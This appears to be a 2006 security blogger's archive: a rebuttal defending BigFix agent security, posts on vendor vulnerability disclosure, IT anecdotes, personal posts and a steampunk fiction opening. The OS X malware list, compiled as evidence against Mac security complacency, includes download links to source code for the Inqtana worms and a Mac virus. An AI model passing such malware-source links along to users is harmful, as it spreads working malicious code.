The software that comes with the OS is insufficient for this purpose (you're going to buy some "software")

In other words, let's assume that the built-ins like WU, UP2DATE, YAST, ports, Software Update, and so on are not going to cut it. Point being, you have decided you have to add something on, and not having extra software isn't an option. If you disagree with this, then you probably have less than a few thousand machines, and the rest of this will be quite boring.

Tom's assertion is that agent-based software is bad, m'kay? and you should avoid it. To be completely fair, I'm seriously summarizing and putting words in his mouth. But take a look at the title of his post I'm responding to "Matasano Security Recommendation #001: Avoid Agents" and this slide which says "Enterprise Management Applications - Threat or Menace?", and you sense a theme. Yes, Tom is quite fair in the details, and will tell you he can only make claims about stuff he has tried, which does not yet include BigFix.

I understand good storytelling, yet I'm getting covered by these blanket statements. So hopefully it is understandable if I feel it necessary to respond.

So, you need some enterprise management software. Your basic choices are agents, and scanners, because I've already ruled out any kind of one-by-one method as impractical by the time you get to a certain size. I'm of the opinion that you can only get so far with pure scanners. For example, they can only determine, they can't change. If it can change, then what you have is a scanner-driven part-time agent. Yes, they push an agent onto the box long enough to do their business, and then get off again. And yes, there is value to only having the agent on there the absolute minimum amount of time, so I don't want to totally dismiss that benefit.

Let's check Tom... OK, he's not advocating scanners. In fact, if I'm not reading too much into it, he's not even saying you shouldn't run agents at all, he just wants fewer. But wait, are we talking per machine, or what?

Minimizing the number of machines that run agent software.

Do you mean that some machines shouldn't run any agents? Then how are you going to manage them? Nothing wrong with hand-maintaining a small number of critical machines, of course, but I don't think that is what is being suggested. So this might be basic choice number 1: Are you at more risk by not having management of your machines, or by having an agent, even if it is a "bad" one? I still have to go with agent. Simple math will get you there. Count all the various threats out there, and only a small handful of them have been aimed at agents.

2. Minimizing the number of different agents supported in the enterprise as a whole.

I think this point is far more central to Tom's message. And I don't disagree with him. Again, no huge surprise, since BigFix replaces a number of other agents. See next point.

Endpoint agents are programs that run silently in the background, usually as Windows Services or Unix daemons, which communicate back to a central management system. Well known examples include:

Systems Management (BMC Patrol, CA Unicenter, Microsoft MOM)
Antivirus (McAfee, Symantec)
Patch Management (Novell ZenWorks, SDS, BigFix)
Data Leakage Prevention

Good definition, I agree. But not on the categories, not for BigFix. We do systems management, AV management (we manage something like 6 or more AV vendors' code and signature updates), AV & antispyware engines (OEM'd), Patch, software distribution, power management, inventory, etc... We do NOT do the HIDS functions ala Blink and Determina. That would be an example of someone else's software we would manage.

So it's incorrect to stick BigFix just in patch. It's a common mistake, that's all we used to emphasize up until a few years ago. And, hey, not Tom's job to make sure our marketing is properly conveyed. But I make a big deal out of it precisely because BigFix is exactly the kind of thing he's calling for to help reduce the number of agents running around.

Agent-based architectures are a severe security risk.

So now Tom makes one of these leaps I object to. He's drawing mass conclusions based on (significant) experience actually looking at a bunch of agent systems. But you can't make a factual statement about all N software products by looking at N-M of them, if M is greater than zero. You can only state generalities.

He gives specifics class examples. While I still owe the world a BigFix architecture document (I know you're all anxiously waiting), let me give some short previews as responses.

Listening Network Services on Agents

You can disable the BigFix notification protocol, and go full polling if you want. We are client pull. Even with the listener in the default listening state, the protocol is simple. It's just a 12-16 byte (payload) UDP packet. It suggests to the agent that there is something upstream that it should check for.

Listening Network Services on Management Servers

OK, got me there. We've discovered that either the agent or the servers need to have something listening on the network, as a general design principle. Are you suggesting that people go without management at all again? I'm pretty sure any alternative to an agent will want a listener, too.

Client of Agent Service on Management Server

That's our default, but it's not necessary if you don't want it. We use the agent on the server to do software upgrade on the server. But you can do it manually if you choose. I, for one, expect a software distribution system to be self-upgrading. But here, you're implying that the server is security-critical. I.e. crack the server, and you have the agents. BigFix doesn't work that way. All the security is in the signing keys.

Confidentiality and Integrity of Agent/Server Protocol

Ah, this is where we're especially awesome. Everything the agent pulls down has been signed by the private key of an administrator, and is verified by the agent before it will save it or look at it. We use OpenSSL and zlib libs, and of course track vulnerabilities in those, and re-release when they re-release.

Web Application on Management Server

I'm suspicious that we're talking about different animals here, but we have an optional Web Reports component that can be run on the server or on its own server. And it can do SSL if you like. It will be there if you do an install taking all the defaults. And again, getting the server for BigFix doesn't get you the agents.

Javascript on Browser Client of Management Server

This is what makes me think we might be talking different animals. We don't have a web-based management interface. Or rather, to be completely up-front, we use the IE libs in our MFC app which is our Console, and everything is run in restricted zones or comes from signed content.

Listening Network Services for Management Clients on Management Server

Isn't this one a dupe?

Middleware Frameworks and RPC

I think, from having listened to your Black Hat talk, this is referring to complicated protocols between the agents and server. We use a subset of HTTP, and move files around.

Client of Management Server Service on Agent

What? Can't parse.

Display Logic for Agent-Sourced Data on Management Client

Ah, we could potentially suffer from this class of problem if we have bugs there. You got one.

Confidentiality and Integrity of Client/Server Protocol

Isn't this a dupe? If not, which Client and Server are we talking, if not the agent and server? The management console? Ours speaks the minimal HTTP and TDS (the MS SQL Server protocol. (Well, the Sybase protocol, but now I'm just being pedantic because I used to work at Sybase.))

Databases

Yep, got one of those. You can't compromise our agents if you get the database.

Agents tend to be installed en-masse. Attacks that offer uniform compromise of all installed agents provide attacks with thousands of hijacked machines.

Yep. True of any central management system, if you find a flaw that allows control of the endpoints. How is this particularly the fault of agents?

Even in the absence of an exploit that compromises agent software directly, it is impractical to ensure the security of thousands of endpoints. But every machine running an agent must be secured if the management components are to be shielded from attacks.

Ah, you assume that only agents can attack the server? Not so for BigFix. Unless the customer has done some extra firewalling, anyone with IP connectivity can talk to the server. Attack away.

In a majority of surveyed agent-based systems, compromise of a single management server allows code execution on every agent, exposing the enterprise to a single point of failure.

For our system, let's call this "stolen keys". Yes, if you steal some keys (and the passphrase), you can act as the owner of those keys. That's why we have key revocation. We've got a whole PKI built-in, it works quite well. Something can always be stolen, spoofed, or impersonated. We went with what we felt has the best security, and has attestation to boot. Our financials customers love the audit trail.

This class of problem is true of any central management system. Steal the important authentication thingy, and you control the endpoints. Why is this particularly an agent problem? Do you prefer some sort of scanner thing that gives the admin creds to every IP it hits? Are you proposing no central management again?

Agent implementations are often substantially homogenous, even across operating systems, enabling uniformly effective attacks against desktops, Windows servers, and Unix servers.

We prefer to think of it as uniform management, but guilty as charged. So yes, if you steal some keys, we have a cross-platform language you can use to command the agents with. Admittedly, for other central management systems, you would have to craft your commands in a number of different shells.

Workstations of management operators are high-value IT targets, and compromised agents can inject poisonous data to exploit a myriad of clientside and XSS-style attacks to hijack their machines.

This is a potentially viable technique if we have bugs in that area. But like I said, you needn't be an agent to attack there, go for it. One of the points from your Black Hat talk was that apps that weren't Internet-facing didn't have to survive those attacks, and were weaker for it (my wording.) So far, our customers with Internet-facing servers and relays where attackers could try feeding bogus data haven't fallen over. Maybe we're just enjoying some obscurity.

[Section on the kinds of things Matasano has found elsewhere.]

No doubt about it, Matasano is good at what they do. I'm looking to have more outside auditing Real Soon Now. I have no illusions that we'll have a 100% flawless clean bill of health when we put it in front of someone of Tom's caliber. What I AM confident about is that we will do far better than the others Tom talks about (but can't name, because they don't have their patches out yet.)

First off, my programmers can beat up your programmers. Second, our architecture is designed to eliminate huge swaths of problems. That thing where we have everything that hits the agents be signed? Right. It means you can't throw attacks at the agents unless they are signed. You have to find flaws in OpenSSL or zlib to try attacks before that stage. While not perfect, we use those libraries for a reason. Third, when something is found, we get our patches out in a timely manner. The last big thing we had? 3 days. And since our system does software distribution and patch management, you could be fully patched about 10 minutes after that, or as soon as your change management allows.

[Tom's mitigating factors]
If I did point-by-point here, a lot of it would be redundant. Hopefully, some summarizing will suffice.

I fully disagree with removing the most important assets from management.
You don't need to segregate classes of managed machines if it's not important to "be an agent"
My protocols are as simple as can be. They just move files around. The files are all signed though, that's going to cause the attackers some trouble.
Suggesting "use SSL" alone is a boondoggle. They key point, easy to miss, is Tom is suggesting that agents sign reports. While that has value, and BigFix will likely offer that as an option in the future, it shouldn't be key to the system surviving.
Use third-party auditing? Actually, I agree with you there, and I will be doing more. But is that recommendation a huge surprise, given Tom's job? ;)

[Full-snark mode, Tom's conclusions]

Agent-based architectures are incredibly convenient and can be a significant cost-saver for IT operations teams.

You forgot: And if you don't have one, or even some other central management system with the exact same class of problems, then you are in FAR, FAR worse shape than having a few agent holes to deal with.

In all circumstances, enterprises should seek to minimize the number of agent installations within their enterprise.

Indeed. And BigFix sales people are standing by.

In all circumstances, enterprises should seek to minimize the number of different agent-based vendors their enterprises must support.

Still right with you there.

Agent-based software should be treated as a high-risk target for attacks. Agent software warrants intensive security testing and analysis and rigorous access control.

Treat us that way if you like, we won't hold it against you. And then we will replace all the vendors who didn't hold up to scrutiny. After all, Tom's talking about our competition.

Apple gives credit to evil haxors?

2006-11-30T01:33:00.000-08:00

(OK, even I have to admit up front that I'm just giving Apple a kick in the joy department for the fun of it over this one.)

So, I'm having a glance at daringfireball.net this evening, to see what kind of Mac security zealotry I should be enraged about lately. Gruber says they gave HD Moore credit. Hey, look at that! He's right.

Now, you would think that with all the recent past history on Apple and vulnerability disclosure, that Apple would have a policy of not crediting researchers who don't "properly" report vulnerabilities, wouldn't you? After all, not even Microsoft will give you credit if you don't play nice. But for Apple, maybe that's not the case? Here's what I believe is their official policy:

For the protection of our customers, Apple does not disclose, discuss or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. Apple usually distributes information about security issues in its products through this site and the mailing list below.

Near as I can tell, that's the entirety of their official written policy. If there's a better version, I'd love a link. Note that it doesn't say anything about giving credit or not.

So maybe it's Apple's policy to give credit to the discoverer of the vuln, regardless of how it is disclosed? If so, then kudos to Apple! You've done one better than Microsoft. Honestly, I don't see why you wouldn't. It's a simply acknowledgment of a fact.

Now, if we could just get proper credit attached to an earlier wireless vuln, and work on not pretending a problem doesn't exist until "any necessary patches or releases are available", then I'd be that much happier.

MS says not exploitable

2006-11-10T16:45:00.000-08:00

Hey, look at Microsoft dropping the disassembly to demonstrate that something isn't exploitable. Nice. I don't think I've seen them do that before.

Shut down the Internet

2006-11-06T20:59:00.000-08:00

A Sybase story this time. I was a network & security guy at Sybase for just under 5 years, between 1995 and 2000.

Speaking of 2000, I was at Sybase for the Y2K rollover. Like most IT shops, we had spent a couple of years planning for Y2K, and as it got closer, we got busier. Then I get a visit from the director of telecom. He tells me that for the rollover weekend, we will be shutting down all Internet, dialup and ISDN links.

What?!?

Yes, his boss, one of the co-CIOs we had at the time, told him to cut off all outside communications because of hackers. The request got dropped in my lap, because I was in charge of all the Internet links, firewalls, and dialup lines.

What?!?

It was explained to me that our CEO, John Chen, had been golfing with one of his buddies from HP, and he had heard through the grapevine that the hackers were going to be out in force on the Y2K weekend, and were saving their attacks for when companies were at their most vulnerable. Therefore, we were going to preemptively take down our communications links, just like HP!

(Remember the scandal about HP taking themselves off the net over the Y2K weekend, screwing their customers? No, you don't. It didn't happen.)

I tried, briefly, to deal with my upstream management on the issue. Nope, I was told it was a done deal. This was several days before the rollover.

I didn't wait long to go over everyone's heads and email the CEO explaining why he was making a mistake. Reasons included things like "You're going to make SURE you have a major outage on the chance that you MIGHT have an attacker-driven outage." "I know a lot of these 'hackers' they will either being working on Y2K at the day job, or drunk for New Years." "What about all of our customers who need last-minute Y2K patches? What about all of our OWN people who need the same from other vendors?" "Do you have any idea what level of attack we already get and live through every day? We get over a million failed connection attempts every day. Literally!".

And he started to relent. I had a reasonable explanation for each of his concerns.

The "deal" was that I would build a monitoring team, so that we had 24-hour around-the-clock coverage of the firewalls and other logs, looking for anything suspicious. I had to report in every so often. Anything really bad, and we would have to pull the plug.

Of course, nothing happened. After about 12 hours, the CEO got really, really bored looking at attack reports. Oh look, a port scan. Oooh... a distributed port scan! Hey, 100,000 attempts to connect to a telnet port that isn't listening.

But I had had to make 8 network & security people work the entire Y2K weekend, 8 hours on, 8 hours off, to be allowed to keep the links up. These were 8 people who had done their jobs ahead of time, like they should have, and by all rights should have had a nice relaxing New Years Eve for the big millenium switch.

And Sybase was just going to screw their customers. Not to mention making us as a company look like idiots.

So, I got my way, forced Sybase to do the right thing, and had to suffer for it. And naturally, I got the warning email after about "going through channels" (which would have got me exactly nowhere. I had had about 2 days.)

I left Sybase on January 31st to go work for SecurityFocus. Sybase had made a corporate decision to essentially spam people, also over my objections. (Did I mention that I was abuse@sybase.com?) Plus, I was starting to get the kind of treatment that made it clear I was being punished for going over people's heads. This just after I had tracked down a rogue sysadmin who was embezzling (a story for another time.)

Since then, I've taken jobs with people and companies that actually care about security.

(No, don't lecture me about what year the millenium rolled over. I have my own ideas about that.)

Crashing MailWorks

2006-11-04T18:28:00.000-08:00

Another Bechtel story.

Bechtel had standardized on DEC MailWorks for their corporate email standard. Previous standard was PROFS on the mainframe. We had enough MailWorks users going that we needed a VMS cluster to deal with the volume, and have some redundancy in case of an outage, maintenance, etc... all the stuff you want a cluster for. I'm actually DEC certified on some of this stuff. I get lots of use out of that now, let me tell you.

One day, mail goes down. The senior VMS admins determine that the MailWorks server process had gone down. On all the machines in the cluster. At the same time.

OK. So they try to run it again, and it comes up. As they are trying to bring it up on another machine in the cluster, they both go down again. It had only been up for a few minutes. So they try one machine by itself. It runs for a minute or two, and goes down again.

They do some dump analysis, and can see that the process is crashing. Not that this helps with how to fix it. After a bit of in-house fiddling, DEC is called. Some phone support doesn't help, must be a hardware problem somewhere. On every box in the cluster? OK, a hardware problem in the cluster interconnect (CI), then. Waste time, cannibalize hardware, break cluster, determine that problem happens on one server, no cluster, and machine works fine for all other software. Dispatch DEC technician to site.

Reload OS, MailWorks software, runs clean. Problem solved? No, when you give it the mail spool, it crashes again. And yes, we DO need our old mail, thanks anyway.

But now we know it's something in our mail files that is causing it. Maybe we can figure that out and surgically remove it? OK, so they binary split the files, and determine that a single email is causing the problem.

This is several days into an outage, mind you.

Email is examined, and it turns out to have a really long subject line, like thousands of characters, almost all spaces. Some experimentation shows that once you hit a subject line of 1K or so in length, MailWorks takes a dive. (Ah yes, I saw that light bulb go off over your head.) And if you have a cluster, when one server crashes, the next one dutifully takes over mail processing, until it hits that same message.

Message is purged, and people can actually get back to work.

They track down the user who sent the killer email, to find out what the heck she was thinking. Turns out she was eating breakfast, and reading her email. A piece of Grape Nuts cereal lodged in her keyboard, and managed to hold the spacebar down. She still sent the email after that, but remembered having to dislodge the offending Grape Nut.

So an entire VMS MailWorks cluster got taken out for days by a piece of Grape Nuts. But that's not the punchline.

After DEC support had been largely useless for days and our guys had to more or less had fix it themselves, we submitted a fix request. We didn't want this happening again. We were able to send a specific problem description, number of characters, sample email, the whole bit.

DEC's response was: Oh yeah, we know about that! Here, we've had a patch available for a while. Why weren't we (one of the largest MailWorks installations in the world) told about that? Oh, uh... you have to call with a problem description that indicates that patch is needed. OK, and when we DID call with a problem like that? And you sent out a technician, why didn't he know? Why don't you publish the patch list? Uh.. well...

And I believe that was my first practical introduction to buffer overflows and vendor patching.

Threat vs. vulnerability

2006-11-02T21:47:00.000-08:00

Inspired in part by Richard Bejtlich, I present Yet Another Horrible Information Security Analogy (YAHISA): A tale of bunnies and kitties.

Imagine a lush green field of grass and clover, where bunnies frolic and play. These are cute white bunnies, with pink eyes. And the occasional black bunny, which inexplicably costs more. The bunnies in this field have no natural predators. The wolves don't know about this field.

Now, picture a city cat that roams the streets, getting into fights, disappearing for days at a time. When it comes home, it's missing a little more of its ear, or occasionally needs to be stitched up. If it gets into a fight, sometimes it wins, sometimes it loses. It will eventually be run over by a car. Its bloated carcass will be poked by children with sticks.

The bunnies are vulnerable. The kitty is vulnerable, and has threats.

You want Mac wireless bugs?

2006-11-01T11:23:00.000-08:00

So, the Month of Kernel Bugs (MoKB) begins today. They start by releasing a live exploit for a remote kernel bug in older PPC Macs with Orinoco-based chipsets. "1999-2003 PowerBooks, iMacs". (Note: I've done no independent verification of the bug, I just trust the people reporting it.)

With no official notification to Apple, and no patch available.

~~Even though the machine I'm typing this on right now is vulnerable to the exploit,~~ I believe this is the appropriate way to handle this release. Why? Because of they way Apple handled the same kind of issue with David Maynor and Johnny Cache, of course.

Apple thinks it should not even acknowledge unpatched bugs. It (apparently) thinks that it should issue press releases denying the issue and use vague legal threats against researchers to "protect customers".

This kind of release is the result. If Apple doesn't want to play responsible disclosure, then the researchers will be happy to oblige. I trust there will be no denial of the problem by any interested parties this time?

(No, not really. The Mac zealots still won't believe it. But it sounds good, anyway.)

Update: I'm taking my Mac off the list of affected machines. It's an iBook G4 with an Airport Extreme that was purchased separately. It appears that the Extreme (802.11g) version of the Airport isn't affected by this particular bug. I might as well try to be careful about technical accuracy. I've seen how the Mac community reacts to any little inaccuracy.

Purpose of a firewall

2006-10-28T13:48:00.000-07:00

Periodically, I see statements like "firewalls are useless" or "firewalls are dead". (Or IDS, or antivirus, pick your favorite security product category.) Does that mean you no longer need a firewall? Of course not. What it really means is a couple of things; One, a firewall is such a obvious requirement that it is just a given. And two, client-side holes are exploited so frequently that firewalls are not considered to contribute significantly as a preventative measure anymore.

Allow me to remind everyone what the purpose of a firewall is. A firewall exists so that you can do something risky on the protected side. That's it. You want to use Windows networking? You want to use cleartext protocols? You want to use enterprise software? (Or is that Enterprise Software.) Then you do that kind of thing behind a firewall.

If the systems, software, and protocols were hardened enough that they could be on a bare Internet connection, you wouldn't need a firewall. But I've never seen a company that didn't use at least one piece of software that couldn't make that cut. So they have a firewall.

Firewalls exist so that you can do risky things on the protected side.

Microsoft vs. McAfee & Symantec

2006-10-23T16:49:00.000-07:00

I write for the Windows Secrets newsletter. Usually, you can only see my articles if you're a paid subscriber. Every once in a while, I end up writing a special update, or the featured article. Meaning, you can read them for free. I figure if you read this blog, then you probably have some interest in my writing.

This article is my take on the whole debate about Microsoft locking vendors out of the Vista 64-bit kernel.

Nicolas Brulez analyses a virus

2006-10-21T18:47:00.000-07:00

Nice example of a virus/bot analysis by Nicolas Brulez at Websense:

http://www.websense.com/securitylabs/blog/blog.php?BlogID=91

Has some good IDA Pro tips. Nicolas is a really good reverse engineer. He taught me the proper way to unpack a file, and helped me give a presentation at the first RECon.

RSS Feed

2006-10-21T16:15:00.000-07:00

I suspect that no one has as of this writing, but if you've subscribed to my blog with the default Blogger Atom feed, I would appreciate if you switch to my Feedburner one. You can see it in the upper-right if you're reading this in a browser, or use this link:
http://feeds.feedburner.com/Ryanlrussell .

This is so I can keep track of you if you read this via RSS. I've also added a Site Meter counter. I'm pretty new to Blogger. If I screwed up something, please let me know.

So what's up with Digg?

2006-10-21T10:58:00.000-07:00

First thing: I am an utter newb when it comes to Digg.com. So a lot of this post amounts to stupid user questions. But hey, maybe I'll get some answers. I did try to do some searching, but the sheer volume of "digg" hits with any given keyword makes this somewhat challenging. The voume is one of the things that makes Digg useful, but I normally read it through an RSS feed.

Yesterday, I was in a debating mood. So I waded into a Mac security discussion on Digg, here:
http://digg.com/tech_news/Mac_attacks_rare_but_rising
This is me on Digg:
http://digg.com/users/ryanlrussell/dugg
(And no arguement from me that the original article there is inflamatory and inaccurate. I wanted to argue with the people who don't know the difference between threats and vulnerabilities, and so think the lack of threats mean there are no vulnerabilities.)

A few brief observations. First off, tons of Mac fanboys who aren't particularly knowledgeable about security, but have a lot of blind faith. No surprise. If I make a post to the contrary, give a counterexample, or ask someone to explain their position, it gets dugg down. Also no real surprise, I've seen this happen before with other users. But I find the volume and consistency of that behavior interesting. It appears that if you don't like or don't agree with someone's post, you give it a negative digg. Well, I don't, at least not yet. If you're discussing something , simply shouting down the other person is pointless and rude. But I see that that is how it works. I'm guessing it's gameable, too? By just simply having multiple accounts?

I see that as broken. And this is from the point of view on a longtime Slashdot user. Sure, I'm used to seeing unpopular opinions modded down on Slashdot in a similar fashion. But not nearly to the same degree. Why is that? Because Slashdot has caps on both mod points, and how high or low something can be modded? And most people don't get mod points often? Because you have to supply a reason for the moderation (interesting, flamebait, etc...)? Because you can see someone's ID number, and can tell how long they have been on Slashdot? Because you can't both moderate and participate in the same discussion? I'm not sure, probably some combination of those and other factors I haven't observed.

I will throw one opinion out there, that it's probably a bad idea to simply give people an infinite supply of anonymous red buttons to shout down someone they disagree with. Especially if those buttons don't obviously represent some objective quality of the post in question.

Now, some regular bugs/questions/feature requests:

Why aren't discussions threaded? Why, in order to reply to a particular comment, do I have to go find the parent to the whole thread? Then I probably have to click "show comment" because it was dugg down too far. Then click reply. Then scroll all the way back up and find the post I wanted to reply to. Then manually copy the person's username into my post to show which person I'm replying to. Then cut-and-paste the text I want to quote. Doesn't seem very Web2.0y. How about if there's just a "reply" button on every post so that it's clear who I'm replying to, and it could even autoquote. You know, like every email client for the last 20 years.
How do I know when a discussion I'm participating in has been responded to? Part of this is related to the previous threading issue, I'm sure. It's hard to track who is talking to whom, when the discussion is almost entirely flat. So, fix that, and then give me the option of getting an email when someone responds to me. Or at least a link somewhere on the site where I can see new responses I haven't viewed yet. Where's my "subscribe to this thread" button?
There's no way for me to link to a particular comment?
When digging stories, I can filter by particular topics and properties of the sumissions (age, popularity, etc..) How do I filter out the ones I've already dugg?
Where is Digg's todo/upcoming features list?
Where the bug database for Digg, so I can see if these things are known or have been requested?

I'm not just trying to complain. Some of these things must have simple answers, and if someone would supply those for me, I would appreciate it. I have tried to do some searching, but "digg" and any keyword you can think of will simply pull up a list of stories that have been linked from Digg for that topic. There needs to be a keyword that indicates that it's about Digg itself, "metadigg" perhaps.

And, naturally, I have dugg this blog entry, so I can see some of the rest of the proccess, and maybe some answers to my questions. If you diggers do end up coming and helping me out, then I thank you in advance.
http://digg.com/design/Some_observations_on_Digg_from_a_newbie

OS X Malware

2006-10-21T01:08:00.000-07:00

Just to be up front about it: Yes, this entry was created in the spirit of stabbing OS X zealots in the eye with a lit cigarette. Why? It drives me absolutely insane when people who clearly have no concept of how these things work insist that Macs can't get malware, don't have vulnerabilities, or have some magic security model. Yes, I realize trying to educate someone like that is masochistic. However, I wanted to have a more convenient place to point to when some clueless Mac fanboy says "show me even one virus for OS X!!".

I don't care to claim that the problem of malware on OS X has in any way reached significant levels. Nor am I trying to say that it is immanent. I do mean to say that is it not non-existent, and that it is certainly not impossible that it could happen.

So I'm going to try to maintain a list. I'm doing "malware" here, not exploits nor vulnerabilities. For my purposes, that includes viruses, trojan horses, worms, rootkits and spyware. I'm also going to limit this list to malware designed for OS X. There is a long list of macro/Office based stuff, things for OS 9 and below, and so on. Yes, I realize that some of it still probably works fine on OS X under the right circumstances.

Malware:
"Opener"
01Apr2004~22Oct2004
Rootkit
http://www.macintouch.com/opener.html

"osxrk"?
08Sep2004
Rootkit
http://freaky.staticusers.net/ugboard/viewtopic.php?t=13891

"Togroot"?
http://www.oreillynet.com/cs/user/view/cs_msg/72381

"WeaponX"
~05Nov2004
http://packetstorm.security-guide.de/filedesc/wX.tar.html

(Sony Rootkit)
~11Nov2005
Rootkit
http://www.tuaw.com/2005/11/11/sonys-drm-now-for-macs-too/

"Leap-A"
16Feb2006
Trojan/Worm
http://www.macrumors.com/pages/2006/02/20060216005401.shtml
http://www.ambrosiasw.com/forums/index.php?showtopic=102379
http://www.symantec.com/security_response/writeup.jsp?docid=2006-021614-4006-99

"Inqtana.A"
22Feb2006
Worm
http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0534.html
http://www.symantec.com/security_response/writeup.jsp?docid=2006-021715-3051-99
Source: http://www.digitalmunition.com/InqTana-ABC.tgz

"Inqtana.B"
22Feb2006
Worm
http://www.symantec.com/security_response/writeup.jsp?docid=2006-031413-1704-99
http://www.sophos.com/security/analyses/osxinqtanab.html
Source: http://www.digitalmunition.com/InqTana-ABC.tgz

"Inqtana.C"
22Feb2006
Worm
http://www.f-secure.com/v-descs/inqtana_c.shtml
Source: http://www.digitalmunition.com/InqTana-ABC.tgz

"OSX.Macarena"
02Nov2006
Virus
http://blogs.securiteam.com/index.php/archives/714
http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-110217-1331-99&tabid=1
Source: http://vx.netlux.org/src_view.php?file=machoman.zip

Not malware:
http://apple.slashdot.org/article.pl?sid=06/09/16/182207
But I put it here for reference. This is to address the people who want to claim that malware would have to ask for your admin password. Not that there is any requirement that malware be root, of course. In the OS X security model, any admin user can write to everything in /Applications.

InqTana.D
http://www.digitalmunition.com/hacklu.html
According to the author, .D is no longer a worm, but is an autorooter. Unless I have time to look at it later and change my mind, it does not appear to meet my definition of malware.

What makes a good programmer

2006-09-16T14:46:00.000-07:00

Aha! I just found a quote from Joel which puts into words what makes a good programmer.

You need training to think of things at multiple levels of abstraction simultaneously, and that kind of thinking is exactly what you need to design great software architecture.

The quote can be found in this blog post.

I didn't realize it before, but this is what makes the good programmers at BigFix, good.

Ruth's Chris Steak House

2006-09-09T15:47:00.000-07:00

It was my birthday the other day (37. Thanks for asking.) I wasn't really into a party or cake or presents or anything, so my wife took me to dinner. We went to Ruth's Chris Steak House. The food and service were both excellent! It's just a little expensive, though. It actually ended up being a bit more expensive than we even thought it was going to be, because our waitress misquoted the price on one of the specials about $40 too low. It wasn't a big deal, and the correct price wasn't really out of line with the rest of the items. So, two of us, I had the American kobe beef special and the Australian lobster tail special, wife had a filet, we had 3 sides, and cheesecake for dessert (dessert was free, because of the birthday.)

The total was $192 before tip and valet. I wouldn't have spent quite that much on purpose, but man that was good.

ELER Mention

2006-09-09T14:25:00.000-07:00

One of the on-line comic strips I like to read is Everybody Loves Eric Raymond. I got a mention there the other day, as "Famous security dude Blue Boar (Ryan Russell)". (Yes, I'll accept that description :) ).

The comic that day, "Bruce Schneier Facts" is also quite hilarious, as is the database that goes with it.

He has a "Knuth is my homeboy" t-shirt, which I purchased. I happen to be wearing it as I type this. It's just a funny shirt all-around, but you would't enjoy it on as many levels as I do, flavin.

One reason is that my main character from the "Stealing the Network" series uses "Knuth" as a handle, mostly to piss off the other hackers. (Which worked pretty well on Fyodor.) Another reason is because the picture used was taken by Jake Appelbaum, whom I have met a number of times.

So I wore the shirt to Black Hat one of the days, and had Johnny Long take a picture of me in it with Darci and Jaime.

Why can't I print this email?

2006-09-09T14:00:00.000-07:00

Why can't I print this email?

Many years ago (about 1990-1995) I worked at Bechtel in San Francisco. It was the kind of place that made you wonder if Dilbert creator Scott Adams worked there. So I will likely have a number of stories that are set there, if i can remember them.

Bechtel was a long-time DEC VAX shop, so we ended up using a lot of strange DEC products, probably long after we should have been. For example, DEC PathWorks, which was DEC's weird LANMAN-based NETBIOS over DECNet (Phase IV). We were also using the DEC email product, I want to say it was called "MailWorks", but I can't actually remember. A lot of their stuff had "works" in the name, I think they were trying to convince themselves. And this is back in the day when Windows wasn't a given, and we're talking Windows 3.1x.

So one of the executives calls the helpdesk, and wants to know why he can't print his email. We thought that was a little strange, since the printing generally worked well. We troubleshot the usual queue problems and such, and then sent someone up to see him. OK, so the problem turned out to be that the print function just wasn't there in the program mode he was in, which was the compose mode. In other words, he wanted to print the note while he was still typing it up.

OK, so why did he want to do that, we asked him. He said he couldn't send it unless he printed it out. Huh? Of course he could, just press the "send" button. And you can even print it out from your "sent" items, if you want. No, he doesn't want to send it that way, and he needs to print it!

After backing up several steps, the person finally gets the full story out of him. What he wanted to was type it in the compose window, print it out, and the FAX it to the person it was addressed to. That's right, he just wanted to use the email program as a word processor.

When questioned as to why he didn't just send it via email, he said that he couldn't be sure it got there that way. OK, so why is FAX any better? You can't tell that it got sent for sure that way either.

Yes you can, he replied. You can see the paper going into the machine, so you know it got sent.

Tap Whistle

2006-09-09T13:29:00.000-07:00

Tap Whistle

(Orginally from a writing exercise I did in my Slashdot Journal. There's a writer there by the name of SolemnDragon, and she occasionally gives out said exercises. This "universe" is one I've had in mind for a while. I haven't been satisfied with the level of tech detail in other steampunk stuff I've read. I may do more in this vein, we'll see.)

Tap Whistle hated to work in the rain. It loosened the black from the streets and buildings, and made the manhole diving unbearable. You didn't want to get caught by the Plumbers when it was raining. If you tried to run, you'd just end up slipping in the black runoff. After a couple of hours of rain like today, the sewers would be full up to your knees.

It also seeped into the battery jars, and the top layer of grease would short out the 'nodes, leaving you no voltage. Anyway, you didn't want to get caught with a jar if you could help it, or else you would be charged under the Tesla ban.

The rain made it too noisy to scope the street for audio, too. Not that sound would do him any good at the machine point he planned to monitor today, not from the topside.

Whistle wouldn't even bother on a day like today, except that he had a rare motivation, a paying customer. It seems that several of the local "plumbers apprentices" had named him as the best when the norm had come around looking to hire a hole diver. He was even more nervous than Whistle, and it made him laugh inside to think how paranoid the norm was about getting caught. Whistle wasn't worried, why not get paid for some of his fun? He suspected he wouldn't be able to get the message anyway.

Whistle didn't actually have to pop any holes today, so he had left the crowbar at home. This junction point was big enough that it had its own housefront. Most of the major machine points had a little house-like building on top of them. The house part was little more than a single-story box with a front door. Inside was just some storage, a wall of valves that ran below, and the circular metal starcase that led down to the workroom. Whistle had a key that he had traded for, that would open the front door. It was a simple warded key, not one of the newer pin tumblers. Those were not thought to be reliable enough, though the lockers considered them more secure. That was about the extent of Whistle's lock knowledge, which he had mostly picked up from trade pamphlets and a couple informal demos from the lockers at the meetings.

Whistle checked for any of the copper-clad Plumbers carriages on the street before letting himself in the door. Once inside with the door closed behind him, he headed straight downstairs.

At the bottom of the stairs, he stepped right into the water, feeling the cold grip on his calves, dragging at his pant legs. The rain was seeping from the walls, and dripping from the curved ceiling, between the bricks. Parts of the sewers under the city went back to Roman times, though not under a machine point. In a machine point like this, they had typically been dug down two stories worth, and rebuilt, like a mini Underground station in the dark. They didn't carry any trains though, just pipes and conduit.

Whistle's target today was Lloyd's. They were an old user, so they still mostly used the pneumatics. Usually, only the newer users used rods, because they didn't have as many feeds to convert. There were a couple of exotic hydrolics in town, used in local building carrys, but that was only the standard in America. You wouldn't find a hydrolic in an official machine point. Whistle had a few catalogs from Edison's Hydrologic Manufacturing Company, describing what they had over there.

He lit the gaslight, and pulled a couple of books from his pack. One was the city feed directory, which would give him the numbers he needed to check for. Customers would use these to look up the endpoint and route. The other was a stolen PCL manual, which would give him the stamped numbers he would need to read off the pipe he wanted. He looked up the machine station he was in, and found the list of Lloyd's serials. Lloyd's had mostly low numbers, they had been around longer.

